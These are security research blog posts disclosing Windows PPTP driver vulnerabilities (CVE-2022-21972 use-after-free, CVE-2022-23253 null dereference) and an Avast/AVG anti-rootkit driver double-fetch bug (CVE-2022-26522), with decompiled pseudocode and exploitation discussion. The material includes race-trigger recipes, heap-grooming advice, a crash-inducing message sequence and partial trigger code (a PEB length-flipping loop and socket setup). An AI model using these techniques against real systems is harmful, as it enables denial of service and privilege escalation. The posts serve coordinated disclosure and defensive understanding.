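    assert(dueTime < 0 && "expected a relative (negative) due time");
    return -dueTime / HUNDRED_NS_PER_SECOND;
}

/* Build a relative due time from a number of seconds. */
static int64_t SecondsToRelativeDueTime(int64_t seconds) {
    return -seconds * HUNDRED_NS_PER_SECOND;
}
```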

The CtlpWaitTimeout function is used to handle the timer callback and it has the following pseudo code:

LONG __fastcall CtlpWaitTimeout(PVOID Handle, PptpCtlCtx *Context)
{
    PptpCtlCtx *lpCtlTimeoutEvent;

    lpCtlTimeoutEvent = Context;
    CtlpDeathTimeout(Context);
    return KeSetEvent(&lpCtlTimeoutEvent->CtlWaitTimeoutTriggered, 0, 0);
}

As we can see the function mainly serves to call the eerily named CtlpDeathTimeout function, which has the following pseudo code:

void __fastcall CtlpDeathTimeout(PptpCtlCtx *CtlCtx)
{
    PptpCtlCtx *lpCtlCtx;
    __int64 Unkown;
    CHAR *v3;
    char SockAddrString;

    lpCtlCtx = CtlCtx;
    memset(&SockAddrString, 0, 65ui64);
    if...
    CtlSetState(lpCtlCtx, CtlStateUnknown, Unkown, 0);
    CtlCleanup(lpCtlCtx, 0);
}

This is where things get even more interesting. The CtlCleanup function is the function responsible for starting the process of tearing down the PPTP control connection. This is done in two steps. First, the state of the Control connection is set to CtlStateUnknown which means that the CtlpEngine function will be prevented from processing any further control connection data (kind of). The second step is to push a task to run the similarly named CtlpCleanup function onto a background worker thread which belongs to the raspptp.sys driver.

The end of the CtlpCleanup function contains the following code that will be very useful for us being able to trigger a use after free as it will always run on a different thread to the CtlpEngine function.

result = (unsigned int)_InterlockedExchangeAdd(&lpCtlCtxToCleanup->CtlCtxReferenceCount, 0xFFFFFFFF);
if ( (_DWORD)result == 1 )
    result = ((__int64 (__fastcall *)(PptpCtlCtx *))lpCtlCtxToCleanup->fpCtlCtxFreeFn)(lpCtlCtxToCleanup);

It decrements the reference count on the PptpCtlCtx object and even better is that no part of this timeout pipeline increments the reference count in a way that would prevent the free function from being called!

So, theoretically, all we need to do is find some way of getting the CtlpCleanup and CtlpEngine functions to run at the same time on separate threads and we will be able to cause a use after free!
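To make the missing step concrete, here is a single-threaded model of the interleaving, with a hypothetical CtlCtxModel standing in for PptpCtlCtx and a Freed flag standing in for the real free. It shows one common way this class of bug is closed, namely the receive path taking its own reference around parsing. It is an illustration only, not a description of how Microsoft's patch actually changed raspptp.sys.

```c
#include <assert.h>
#include <stdatomic.h>

typedef struct CtlCtxModel {
    atomic_int RefCount;
    int Freed; /* set instead of freeing, so the model can be inspected */
} CtlCtxModel;

static void CtxInit(CtlCtxModel *ctx) {
    atomic_init(&ctx->RefCount, 1); /* creator's initial reference, as in CtlAlloc */
    ctx->Freed = 0;
}

static void CtxReference(CtlCtxModel *ctx) {
    assert(!ctx->Freed && "referencing a freed context");
    atomic_fetch_add(&ctx->RefCount, 1);
}

static void CtxDereference(CtlCtxModel *ctx) {
    assert(!ctx->Freed && "dereferencing a freed context");
    if (atomic_fetch_sub(&ctx->RefCount, 1) == 1)
        ctx->Freed = 1; /* stands in for calling fpCtlCtxFreeFn */
}

/* Receive path: pin the context before parsing (the step the post
 * shows is missing for PptpCtlCtx) and unpin it afterwards. */
static void ReceiveBegin(CtlCtxModel *ctx) { CtxReference(ctx); }
static void ReceiveEnd(CtlCtxModel *ctx) { CtxDereference(ctx); }

/* Cleanup path: drops the initial reference, mirroring the decrement
 * at the end of CtlpCleanup. */
static void CleanupRelease(CtlCtxModel *ctx) { CtxDereference(ctx); }
```

If ReceiveBegin and ReceiveEnd are removed, CleanupRelease alone takes the count from 1 to 0 and frees the context while the parser could still be using it, which is the situation described above.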

However, before we celebrate too early, we should take a look at the function that actually frees the PptpCtlCtx structure, because it is yet another callback. The fpCtlCtxFreeFn property is a function pointer to the CtlFree function. This function does a decent amount of teardown as well, but the bits we care about are the following lines:

WskCloseSocketContextAndFreeSocket(CtlWskContext);
lpCtlCtxToFree->CtlWskClientSocketCtx = 0i64;
...
ExFreePoolWithTag(lpCtlCtxToFree, 0);

Now there is an added complication in this code that is going to make things a little more difficult. The call to WskCloseSocketContextAndFreeSocket actually closes the client socket before freeing the PptpCtlCtx structure. This means that at the point the PptpCtlCtx structure is freed, we will no longer be able to send new data to the socket and trigger any more calls into CtlpEngine. However, this doesn’t mean that we can’t trigger the vulnerability: if data is already being processed by CtlpEngine when the socket is closed, we simply need to hope the thread stays in the function long enough for the free to occur in CtlFree, and boom – we have a UAF.

Now that we have a good old fashioned kernel race condition, let’s take a look at how we can try to trigger it!

The Race Condition

Like any good race condition, this one contains a lot of moving parts and added complication which make triggering it a non trivial task, but it’s still possible! Let’s take a look at what we need to happen.

  1. 30 second timeout is triggered and eventually runs CtlCleanup, pushing a CtlpCleanup task onto a background worker thread queue.
  2. Background worker thread wakes up and starts processing the CtlpCleanup task from its task queue.
  3. CtlpEngine starts or is currently processing data on a WSK dispatch thread when the CtlpCleanup function frees the underlying PptpCtlCtx structure from the worker thread!
  4. Bad things happen…

Triggering the Race Condition

The main questions for this race condition are: what limits apply to the data we can send to the server so that we spend as much time as possible in the CtlpEngine parsing loop, and can we do this without cancelling the timeout?

Thankfully, as previously mentioned, the only way to cancel the timeout is to perform a PPTP control connection handshake, which technically means we can get the CtlpEngine function to process any other part of the control connection as long as we don’t start the handshake. However, the state machine within CtlpEngine requires the handshake to take place before any other part of the control connection is enabled!

There is one part of the CtlpEngine state machine that can still be partially validly hit (without triggering an error) before the handshake has taken place. This is the EchoRequest control message type. Now we can’t actually enter the proper handling of the message type before the handshake has taken place but what we can do is use it to iterate through all the sent data in the parsing loop without triggering a parsing error. This effectively forms a way of us spinning inside the CtlpEngine function without cancelling the timeout which is exactly what we want. Even better is that this remains true when the CtlStateUnknown state is set by the CtlCleanup function.

Unfortunately the maximum amount of data we can process in one WSK receive data event callback trigger is limited to the maximum data that can be received in one TCP packet. In theory this is 65,535 bytes but due to the size limitation of Ethernet frames to 1,500 bytes we can only send ~1,450 bytes (1,500 minus the headers of the other network layer frames) of PPTP control messages in a single request. This works out at around 90 EchoRequest messages per callback event trigger. For a modern CPU this is not a lot to churn through before hopping out of the CtlpEngine function.
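The figure of around 90 messages follows from the size of an Echo-Request. The layout below is taken from RFC 2637, where an Echo-Request is 16 bytes on the wire (all fields big-endian). The ~1,450 byte payload budget is the post's own estimate; 1,500 bytes minus 20 bytes each of IPv4 and TCP headers would give 1,460 without options, which still works out at about 90 messages. MessagesPerSegment is a hypothetical helper.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* PPTP Echo-Request control message layout per RFC 2637. */
typedef struct PptpEchoRequest {
    uint16_t Length;             /* total message length: 16 */
    uint16_t PptpMessageType;    /* 1 = control message */
    uint32_t MagicCookie;        /* 0x1A2B3C4D */
    uint16_t ControlMessageType; /* 5 = Echo-Request */
    uint16_t Reserved0;
    uint32_t Identifier;
} PptpEchoRequest;

static_assert(sizeof(PptpEchoRequest) == 16, "Echo-Request is 16 bytes");

/* How many whole messages of a given size fit in a payload budget. */
static size_t MessagesPerSegment(size_t payloadBudget, size_t messageSize) {
    assert(messageSize > 0);
    return payloadBudget / messageSize;
}
```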

Another thing to consider is how do we know if the race condition was successful or a failure? Thankfully in this regard the server socket being closed on timeout works in our favour as this will cause a socket exception on the client if we attempt to send any more data once the server closes the socket. Once the socket is closed we know that the race is finished but we don’t necessarily know if we did or didn’t win the race.

With these considerations in place, how do we trigger the vulnerability? It actually becomes a simple proof of concept. Effectively we just continually send EchoRequest PPTP control frames in 90 frame bursts to a server until the timeout event occurs and then we hope that we’ve won the race.

We won’t be releasing the PoC code until people have had a chance to patch things up but when the PoC is successful we may see something like this on our target server:

Because the PptpCtlCtx structure is de-initialised, there are a lot of pointers and properties containing invalid values that, if used in different parts of the receive event handling code, will cause crashes in non-fun ways such as null pointer dereferences. This is actually what happened in the Blue Screen of Death above, but the CtlpEngine function did still process a freed PptpCtlCtx structure.

Can we use this vulnerability for anything more than a simple BSOD?

Exploitation

Due to the state of mitigation in the Windows kernel against memory corruption exploits and the difficult nature of this race condition, achieving useful exploitation of the vulnerability is not going to be easy, especially if seeking to obtain Remote Code Execution (RCE). However, this does not mean it is not possible to do so.

Exploitability – The Freed Memory

In order to assess the exploitability of the vulnerability, we need to look at what our freed memory contains and whereabouts it sits in the Windows kernel heap. In WinDbg we can use the !pool command to get some information on the allocated chunk that will be freed in our UaF issue.

ffff828b17e50d20 size: 2a0 previous size: 0 (Allocated) *PTPT

We can see here that the size of the freed memory block is 0x2a0, or 672 bytes. This is important as it puts us in the allocation size range for the variable size kernel heap segment. This heap segment is fairly convenient for use after free exploitation because the variable size heap also maintains a free list of chunks that have been freed, along with their sizes. When a new chunk is allocated, this free list is searched, and if a chunk of an exact or greater size is found it will be used for the new allocation. Since this is the kernel, any other part of the kernel that makes non-paged pool allocations of this or a similar size could end up using this freed slot as well.
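The 0x2a0 figure is consistent with the 0x290 bytes requested by CtlAlloc, assuming that !pool reports chunk sizes including the 16-byte x64 POOL_HEADER and that requests are rounded up to 16-byte granularity. A quick sketch of that arithmetic under those assumptions (PoolChunkSize is a hypothetical helper, not a Windows API):

```c
#include <assert.h>
#include <stddef.h>

/* Assumption: x64 pool chunks carry a 16-byte header that !pool includes
 * in the size it reports. */
#define X64_POOL_HEADER_SIZE 0x10u

static size_t PoolChunkSize(size_t requestedBytes) {
    assert(requestedBytes > 0);
    /* Round up to the assumed 16-byte granularity, then add the header. */
    size_t rounded = (requestedBytes + 0xFu) & ~(size_t)0xFu;
    return rounded + X64_POOL_HEADER_SIZE;
}
```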

So, what do we need in order to start exploiting this issue? Ideally we want to find some kernel object whose contents we can control and which is allocated at 0x2a0 bytes in size. This would allow us to create a fake PptpCtlCtx object, which we can then use to control the CtlpEngine state machine code. Finding an exact size match allocation isn’t the only way we could groom the heap for a potential exploit, but it would certainly be the most reliable method.

If we can take control of a PptpCtlCtx object, what can we do? From an exploit development perspective, some of the most powerful parts of this vulnerability are the callback function pointers located inside the PptpCtlCtx structure. Usually a mitigation called Control Flow Guard (CFG) or eXtended Flow Guard (XFG) would prevent us from corrupting these callback pointers and using them with an arbitrary executable kernel address. However, CFG and XFG are not enabled for the raspptp.sys driver (as of writing this blog), meaning we can point execution at any instruction located in the kernel. This gives us plenty of things to abuse for exploitation purposes. The caveat is that we are limited in the number of these gadgets we can use in one trigger of the vulnerability, meaning we would likely need to trigger the vulnerability multiple times with different gadgets to achieve a full exploit, at least on a modern Windows kernel.

Exploitability – Threads

Allocating an object to fill our freed slot and take control of kernel execution through a fake PptpCtlCtx object sounds great, but one additional restriction is that CtlpEngine only uses the freed object for a short period of CPU time. We can’t use the thread that is processing CtlpEngine to allocate objects to fill the empty slot, because any allocation it made would only happen after the thread has returned from CtlpEngine, at which point the vulnerability is no longer exploitable.

What this means is that we would need the fake object allocations to be happening in a separate thread in the hope that we can get one of our fake objects allocated and populated with our fake object contents while the vulnerable kernel thread is still in CtlpEngine, allowing us to then start doing bad things with the state machine. All of this sounds like a lot to try and get done in relatively small CPU windows, but it is possible that it could be achieved. The issue with any exploit attempting to do this is going to be reliability, since there is a fairly high chance a failed exploit would crash the target machine and retrying the exploit would be a slow and easily detectable process.

Exploitability – Local Privilege Escalation vs Remote Code Execution

The ability to exploit this issue for LPE is much more likely to be successful over the affected Windows kernel versions than exploiting it for RCE. This is largely due to the fact that an RCE exploit will need to be able to first leak information about the kernel using either this vulnerability or another one before any of the potential callback corruption uses would be viable. There are also far fewer parts of the kernel accessible remotely, meaning finding a way of spraying a fake PptpCtlCtx object into the kernel heap remotely is going to be significantly harder to achieve.

Another reason that LPE is a much more viable exploit route is that a localhost (127.0.0.1) socket allows far more data to be processed by each WSK receive event callback than the 1,500 byte Ethernet frame cap we are limited to remotely. More data per callback means more time spent inside CtlpEngine, which significantly improves the odds of successful exploitation!

Conclusion

Wormable Kernel Remote Code Execution vulnerabilities are the holy grail of severity in modern operating systems. With great power, however, comes great responsibility. While this vulnerability could be catastrophic in its impact, the skill needed to pull off a successful and undetected exploit is not to be underestimated. Memory corruption continues to become a harder and harder art form to master; however, there are definitely those out there with the ability and determination to achieve the full potential of this vulnerability. For these reasons CVE-2022-21972 is a vulnerability that represents a very real threat to internet-connected, Microsoft-based VPN infrastructure. We recommend that this vulnerability is patched with priority in all environments.

Timeline

  • Vulnerability Reported To Microsoft – 29 Oct 2021
  • Vulnerability Acknowledged – 29 Oct 2021
  • Vulnerability Confirmed – 11 November 2021
  • Patch Release Date Confirmed – 12 November 2021
  • Patch Release – 10 May 2022

The post CVE-2022-21972: Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 1) appeared first on Nettitude Labs.

CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference

CVE-2022-23253 is a Windows VPN (remote access service) denial of service vulnerability that Nettitude discovered while fuzzing the Windows Server Point-to-Point Tunnelling Protocol (PPTP) driver. The implications of this vulnerability are that it could be used to launch a persistent Denial of Service attack against a target server. The vulnerability requires no authentication to exploit and affects all default configurations of Windows Server VPN.

Nettitude has followed a coordinated disclosure process and reported the vulnerability to Microsoft. As a result the latest versions of MS Windows are now patched and no longer vulnerable to the issue.

Affected Versions of Microsoft Windows Server

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 respectively. To see a full list of affected windows versions check the official disclosure post on MSRC: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23253.

Overview

PPTP is a VPN protocol used to multiplex and forward virtual network data between a client and VPN server. The protocol has two parts: a TCP control connection and a GRE data connection. The TCP control connection is mainly responsible for configuring buffering and multiplexing of network data between the client and server. In order to talk to the control connection of a PPTP server, we only need to connect to the listening socket and initiate the protocol handshake. After that we are able to start a complete PPTP session with the server.

When fuzzing for vulnerabilities the first step is usually a case of waiting patiently for a crash to occur. In the case of fuzzing the PPTP implementation we had to wait a mere three minutes before our first reproducible crash!

Our first step was to analyse the crashing test case and minimise it to create a reliable proof of concept. However before we dissect the test case we need to understand what a few key parts of the control connection logic are trying to do!

The PPTP Handshake

PPTP implements a very simple control connection handshake procedure. All that is required is that a client first sends a StartControlConnectionRequest to the server and then receives a StartControlConnectionReply indicating that there were no issues and the control connection is ready to start processing commands. The actual contents of the StartControlConnectionRequest has no effect on the test case and just needs to be validly formed in order for the server to progress the connection state into being able to process the rest of the defined control connection frames. If you’re interested in what all these control packet frames are supposed to do or contain you can find details in the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637).

PPTP IncomingCall Setup Procedure

In order to forward some network data to a PPTP VPN server, the control connection needs to establish a virtual call with the server. There are two types of virtual call when communicating with a PPTP server: outgoing calls and incoming calls. To communicate with a VPN server from a client we typically use the incoming call variety. Finally, to set up an incoming call from a client to a server, three control message types are used.

  • IncomingCallRequest – Used by the client to request a new incoming virtual call.
  • IncomingCallReply – Used by the server to indicate whether the virtual call is being accepted. It also sets up call IDs for tracking the call (these IDs are then used for multiplexing network data as well).
  • IncomingCallConnected – Used by the client to confirm connection of the virtual call and causes the server to fully initialise it ready for network data.

The most important bit of information exchanged during call setup is the call ID. This is the ID used by the client and server to send and receive data along that particular call. Once a call is set up data can then be sent to the GRE part of the PPTP connection using the call ID to identify the virtual call connection it belongs to.

The Test Case

After reducing the test case, we can see that at a high level the control message exchanges that cause the server to crash are as follows:

StartControlConnectionRequest() Client -> Server
StartControlConnectionReply() Server -> Client
IncomingCallRequest() Client -> Server
IncomingCallReply() Server -> Client
IncomingCallConnected() Client -> Server
IncomingCallConnected() Client -> Server

The test case appears to initially be very simple and actually mostly resembles what we would expect for a valid PPTP connection. The difference is the second IncomingCallConnected message. For some reason, upon receiving an IncomingCallConnected control message for a call ID that is already connected, a null pointer dereference is triggered causing a system crash to occur.
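Intuitively, the server should treat IncomingCallConnected as valid only while a call is actually waiting to be connected. The sketch below models that as a tiny per-call state machine. The states, CallModel and HandleIncomingCallConnected are hypothetical and do not reflect raspptp.sys internals or how Microsoft's fix was written; the model only illustrates why a repeated message should be rejected rather than trigger a second activation.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical per-call states. */
typedef enum CallState {
    CallStateIdle,
    CallStateWaitConnected, /* IncomingCallReply sent, waiting for IncomingCallConnected */
    CallStateEstablished    /* virtual circuit activated */
} CallState;

typedef struct CallModel {
    CallState State;
    int ActivateCount; /* how many times the virtual circuit was "activated" */
} CallModel;

/* Returns 0 on success, -1 if the message is invalid in the current state.
 * Activating only from CallStateWaitConnected turns a repeated
 * IncomingCallConnected into a protocol error instead of a second activation. */
static int HandleIncomingCallConnected(CallModel *call) {
    assert(call != NULL);
    if (call->State != CallStateWaitConnected)
        return -1;
    call->ActivateCount++;
    call->State = CallStateEstablished;
    return 0;
}
```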

Let’s look at the crash and see if we can see why this relatively simple error causes such a large issue.

The Crash

Looking at the stack trace for the crash we get the following:

... <- (Windows Bug check handling)
NDIS!NdisMCmActivateVc+0x2d
raspptp!CallEventCallInConnect+0x71
raspptp!CtlpEngine+0xe63
raspptp!CtlReceiveCallback+0x4b
... <- (TCP/IP Handling)

What’s interesting here is that the crash does not take place in the raspptp.sys driver at all, but instead occurs in the ndis.sys driver. What is ndis.sys? Well, raspptp.sys is what is referred to as a miniport driver, which means that it only implements a small part of the functionality required for an entire VPN interface, and the rest of the VPN handling is performed by the NDIS driver system. raspptp.sys acts as a front-end parser for PPTP, which then forwards the encapsulated virtual network frames to NDIS to be routed and handled by the rest of the Windows VPN back end.

So why is this null pointer dereference happening? Let’s look at the code to see if we can glean any more detail.

The Code

The first section of code is in the PPTP control connection state machine. The first part of this handling is a small stub in a switch statement for handling the different control messages. For an IncomingCallConnected message, we can see that all the code initially does is check that a valid call ID and context structure exists on the server. If they do exist, a call is made to the CallEventCallInConnect function with the message payload and the call context structure.

case IncomingCallConnected:
    // Ensure the client has sent a valid StartControlConnectionRequest message
    if ( lpPptpCtlCx->CtlCurrentState == CtlStateWaitStop )
    {
        // BigEndian To LittleEndian Conversion
        CallIdSentInReply = (unsigned __int16)__ROR2__(lpCtlPayloadBuffer->IncomingCallConnected.PeersCallId, 8);
        if ( PptpClientSide ) // If we are the client
            CallIdSentInReply &= 0x3FFFu; // Maximum ID mask
        // Get the context structure for this call ID if it exists
        IncomingCallCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, CallIdSentInReply);
        // Handle the incoming call connected event
        if ( IncomingCallCallCtx )
            CallEventCallInConnect(IncomingCallCallCtx, lpCtlPayloadBuffer);
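The __ROR2__(x, 8) in the pseudocode is simply a 16-bit byte swap: the call ID arrives in network (big-endian) order, and rotating a 16-bit value by 8 bits swaps its two bytes. A small Python model of that conversion plus the client-side 0x3FFF mask (function names are hypothetical):

```python
def ror16(value: int, shift: int) -> int:
    """Rotate a 16-bit value right by `shift` bits (Hex-Rays shows this as __ROR2__)."""
    value &= 0xFFFF
    shift %= 16
    return ((value >> shift) | (value << (16 - shift))) & 0xFFFF


def call_id_from_field(raw: int, client_side: bool) -> int:
    """Convert the PeersCallId field, loaded as a little-endian word, to the call ID."""
    call_id = ror16(raw, 8)  # byte swap: big-endian wire order -> host order
    if client_side:
        call_id &= 0x3FFF    # "Maximum ID mask", applied only on the client side
    return call_id


# Wire bytes 12 34 loaded on little-endian x64 give 0x3412; the rotate restores 0x1234.
raw = int.from_bytes(b"\x12\x34", "little")
print(hex(call_id_from_field(raw, client_side=False)))  # 0x1234
```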

The CallEventCallInConnect function performs two tasks: it activates the virtual call connection through a call to NdisMCmActivateVc and then, if the status returned by that function is not STATUS_PENDING, it calls the PptpCmActivateVcComplete function.

__int64 __fastcall CallEventCallInConnect(CtlCall *IncomingCallCallCtx, CtlMsgStructs *IncomingCallMsg)
{
    unsigned int ActiveateVcRetCode;
    ...
    ActiveateVcRetCode = NdisMCmActivateVc(lpCallCtx->NdisVcHandle, (PCO_CALL_PARAMETERS)lpCallCtx->CallParams);
    if ( ActiveateVcRetCode != STATUS_PENDING )
    {
        if...
            PptpCmActivateVcComplete(ActiveateVcRetCode, lpCallCtx, (PVOID)lpCallCtx->CallParams);
    }
    return 0i64;
}

...

NDIS_STATUS __stdcall NdisMCmActivateVc(NDIS_HANDLE NdisVcHandle, PCO_CALL_PARAMETERS CallParameters)
{
    __int64 v2; // rbx
    PCO_CALL_PARAMETERS lpCallParameters; // rdi
    KIRQL OldIRQL; // al
    _CO_MEDIA_PARAMETERS *lpMediaParameters; // rcx
    __int64 v6; // rcx

    v2 = *((_QWORD *)NdisVcHandle + 9);
    lpCallParameters = CallParameters;
    OldIRQL = KeAcquireSpinLockRaiseToDpc((PKSPIN_LOCK)(v2 + 8));
    *(_DWORD *)(v2 + 4) |= 1u;
    lpMediaParameters = lpCallParameters->MediaParameters;
    if ( lpMediaParameters->MediaSpecific.Length < 8 )
        v6 = (unsigned int)v2;
    else
        v6 = *(_QWORD *)lpMediaParameters->MediaSpecific.Parameters;
    *(_QWORD *)(v2 + 136) = v6;
    *(_QWORD *)(v2 + 136) = *(_QWORD *)lpCallParameters->MediaParameters->MediaSpecific.Parameters;
    KeReleaseSpinLock((PKSPIN_LOCK)(v2 + 8), OldIRQL);
    return 0;
}

We can see that in reality, the NdisMCmActivateVc function is surprisingly simple. It always returns 0, so CallEventCallInConnect will always go on to call PptpCmActivateVcComplete.

Looking at the stack trace we know that the crash is occurring at an offset of 0x2d into the NdisMCmActivateVc function which corresponds to the following line in our pseudo code:

lpMediaParameters = lpCallParameters->MediaParameters;

Since NdisMCmActivateVc doesn’t sit in our main target driver, raspptp.sys, we have mostly not reverse engineered it, but it’s pretty clear that its main purpose is to set some properties on a structure that is tracked as the handle to NDIS from raspptp.sys. Since this doesn’t seem to be directly causing the issue, we can safely ignore it for now. The variable being dereferenced, lpCallParameters (the CallParameters argument), is passed into the function by raspptp.sys; this indicates that the vulnerability must be somewhere else in the raspptp.sys driver code.

Referring back to the call from CallEventCallInConnect, we know that the CallParameters argument is actually a pointer stored within the Call Context structure in raspptp.sys. We can assume that at some point during the call to PptpCmActivateVcComplete this structure is freed and the pointer member of the structure is set to zero. So let’s find the responsible line!

void __fastcall PptpCmActivateVcComplete(unsigned int OutGoingCallReplyStatusCode, CtlCall *CallContext, PVOID CallParams)
{
    CtlCall *lpCallContext; // rdi
    ...
    if ( lpCallContext->UnkownFlag )
    {
        if ( lpCallParams )
            ExFreePoolWithTag((PVOID)lpCallContext->CallParams, 0);
        lpCallContext->CallParams = 0i64;
        ...

After a little bit of looking we can see the responsible section of code. From reverse engineering the setup of the CallContext structure, we know that the UnkownFlag structure variable is set to 1 by the handling of the IncomingCallRequest frame, where the CallContext structure is initially allocated and set up. For our test case this code will always execute, so CallParams is freed and zeroed after the first IncomingCallConnected message. The second call to CallEventCallInConnect then passes a null CallParameters pointer to NdisMCmActivateVc, triggering a null pointer dereference that crashes the machine in the NDIS layer with the appropriate Blue Screen Of Death.
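To make the sequence concrete, here is a simplified Python model of the three functions above. It is a sketch, not the driver logic: the names are hypothetical stand-ins for the decompiled routines, the pool free is modelled as clearing a reference, and the bug check is modelled as a Python exception.

```python
from dataclasses import dataclass, field
from typing import Optional

STATUS_PENDING = 0x103


@dataclass
class CallParams:
    # Stand-in for CO_CALL_PARAMETERS; only the field NDIS reads is modelled.
    media_parameters: dict = field(default_factory=lambda: {"MediaSpecific.Length": 8})


@dataclass
class CallContext:
    call_params: Optional[CallParams]
    unknown_flag: bool = True  # set while handling IncomingCallRequest


def ndis_m_cm_activate_vc(call_params: Optional[CallParams]) -> int:
    # No NULL check: CallParameters->MediaParameters is read unconditionally.
    if call_params is None:
        raise RuntimeError("NULL CallParameters dereferenced (bug check)")
    _ = call_params.media_parameters
    return 0  # always 0, never STATUS_PENDING


def pptp_cm_activate_vc_complete(ctx: CallContext) -> None:
    if ctx.unknown_flag:
        ctx.call_params = None  # models ExFreePoolWithTag + pointer set to 0


def call_event_call_in_connect(ctx: CallContext) -> None:
    status = ndis_m_cm_activate_vc(ctx.call_params)
    if status != STATUS_PENDING:
        pptp_cm_activate_vc_complete(ctx)


ctx = CallContext(call_params=CallParams())
call_event_call_in_connect(ctx)        # first IncomingCallConnected
try:
    call_event_call_in_connect(ctx)    # second IncomingCallConnected
except RuntimeError as exc:
    print(exc)  # NULL CallParameters dereferenced (bug check)
```

The first message succeeds and clears call_params; the second fails at the equivalent of the lpCallParameters->MediaParameters read, mirroring the crash at NdisMCmActivateVc+0x2d.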

Proof Of Concept

We will release proof of concept code on May 2nd to allow extra time for systems administrators to patch.

Timeline

  • Vulnerability reported To Microsoft – 29 Oct 2021
  • Vulnerability acknowledged – 29 Oct 2021
  • Vulnerability confirmed – 11 Nov 2021
  • Patch release date confirmed – 18 Jan 2022
  • Patch released – 08 March 2022
  • Blog released – 22 March 2022

The post CVE-2022-23253 – Windows VPN Remote Kernel Null Pointer Dereference appeared first on Nettitude Labs.

Vulnerabilities in Avast And AVG Put Millions At Risk

Executive Summary

  • SentinelLabs has discovered two high-severity flaws in Avast and AVG (acquired by Avast in 2016) that went undiscovered for years, affecting dozens of millions of users.
  • These vulnerabilities allow attackers to escalate privileges enabling them to disable security products, overwrite system components, corrupt the operating system, or perform malicious operations unimpeded.
  • SentinelLabs’ findings were proactively reported to Avast during December 2021 and the vulnerabilities are tracked as CVE-2022-26522 and CVE-2022-26523.
  • Avast has silently released security updates to address these vulnerabilities.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.

Introduction

Avast’s “Anti Rootkit” driver (also used by AVG) has been found to be vulnerable to two high severity attacks that could potentially lead to privilege escalation by running code in the kernel from a non-administrator user. Avast and AVG are widely deployed products, and these flaws have potentially left many users worldwide vulnerable to cyber attacks.

Given that these products run as privileged services on Windows devices, such bugs in the very software that is intended to protect users from harm present both an opportunity to attackers and a grave threat to users.

Security products such as these run at the highest level of privileges and are consequently highly attractive to attackers, who often use such vulnerabilities to carry out sophisticated attacks. Vulnerabilities such as this and others discovered by SentinelLabs (1, 2, 3) present a risk to organizations and users deploying the affected software.

As we reported recently, threat actors will exploit such flaws given the opportunity, and it is vital that affected users take appropriate mitigation actions. According to Avast, the vulnerable feature was introduced in Avast 12.1. Given the longevity of this flaw, we estimate that millions of users were likely exposed.

Security products ensure device security and are supposed to prevent such attacks from happening, but what if the security product itself introduces a vulnerability? Who’s protecting the protectors?

CVE-2022-26522

The vulnerable routine resides in a socket connection handler in the kernel driver aswArPot.sys. Since the two reported vulnerabilities are very similar, we will primarily focus on the details of CVE-2022-26522.

CVE-2022-26522 refers to a vulnerability that resides in aswArPot+0xc4a3.

As can be seen in the image above, the function first attaches the current thread to the target process, and then uses nt!PsGetProcessPeb to obtain a pointer to the current process PEB (red arrow). It then fetches (first time) PPEB->ProcessParameters->CommandLine.Length to allocate a new buffer (yellow arrow). It then copies the user supplied buffer at PPEB->ProcessParameters->CommandLine.Buffer with the size of PPEB->ProcessParameters->CommandLine.Length (orange arrow), which is the second fetch.

In the window between these two fetches, an attacker could race the kernel thread and modify the Length field.

Looper thread:

    PTEB tebPtr = reinterpret_cast<PTEB>(__readgsqword(reinterpret_cast<DWORD_PTR>(&static_cast<NT_TIB*>(nullptr)->Self)));
    PPEB pebPtr = tebPtr->ProcessEnvironmentBlock;

    pebPtr->ProcessParameters->CommandLine.Length = 2;

    // Runs in its own thread: toggle Length between 2 and 20002 (2 ^ 20000) forever
    while (1) {
        pebPtr->ProcessParameters->CommandLine.Length ^= 20000;
    }

As can be seen from the code snippet above, the code obtains a pointer to the PEB structure and then repeatedly flips the Length field of the process command line structure between 2 and 20002 (2 XOR 20000).
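The double fetch can be illustrated deterministically in Python. This is a model, not the driver code: read_length is a hypothetical stand-in for reading CommandLine.Length from user memory, and instead of relying on thread scheduling, itertools.cycle forces the interleaving the looper thread is trying to win (2 on the first read, 20002 on the second). In the real driver the second copy would overrun the pool buffer rather than raise an exception.

```python
import itertools
from typing import Callable


def vulnerable_copy(read_length: Callable[[], int], source: bytes) -> bytearray:
    """Double fetch: the length is read once to size the buffer and again to copy."""
    buf = bytearray(read_length())          # first fetch: allocation size
    copy_len = read_length()                # second fetch: copy size
    if copy_len > len(buf):
        # In the kernel this would be a pool overflow rather than an exception.
        raise OverflowError(f"copying {copy_len} bytes into a {len(buf)}-byte buffer")
    buf[:copy_len] = source[:copy_len].ljust(copy_len, b"\x00")
    return buf


def single_fetch_copy(read_length: Callable[[], int], source: bytes) -> bytearray:
    """Usual remedy for double fetches: capture the length once, use it for both steps."""
    length = read_length()
    buf = bytearray(length)
    buf[:] = source[:length].ljust(length, b"\x00")
    return buf


# The looper thread toggles Length between 2 and 2 ^ 20000 == 20002.
lengths = itertools.cycle([2, 2 ^ 20000])
try:
    vulnerable_copy(lambda: next(lengths), b"A" * 20002)
except OverflowError as exc:
    print(exc)  # copying 20002 bytes into a 2-byte buffer
```

The single-fetch variant is shown only to contrast the pattern; the post does not describe how Avast fixed the driver.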

The vulnerability can be triggered inside the driver by initiating a socket connection as shown by the following code.

    WSADATA wsa;
    SOCKET s;
    struct sockaddr_in server;
    const char *message;

    printf("\nInitialising Winsock...");
    int err = WSAStartup(MAKEWORD(2, 2), &wsa);
    if (err != 0) {
        // WSAStartup returns its error code directly; WSAGetLastError is not valid here
        printf("Failed. Error Code : %d", err);
        return 1;
    }

    printf("Initialised.\n");
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
        printf("Could not create socket : %d", WSAGetLastError());
        return 1;
    }
    printf("Socket created.\n");

    // IP_ADDRESS is a target-address macro whose definition is not shown here
    server.sin_addr.s_addr = inet_addr(IP_ADDRESS);
    server.sin_family = AF_INET;
    server.sin_port = htons(80);

    if (connect(s, (struct sockaddr*)&server, sizeof(server)) == SOCKET_ERROR) {
        puts("connect error");
        return 1;
    }

    puts("Connected");

    message = "GET / HTTP/1.1\r\n\r\n";
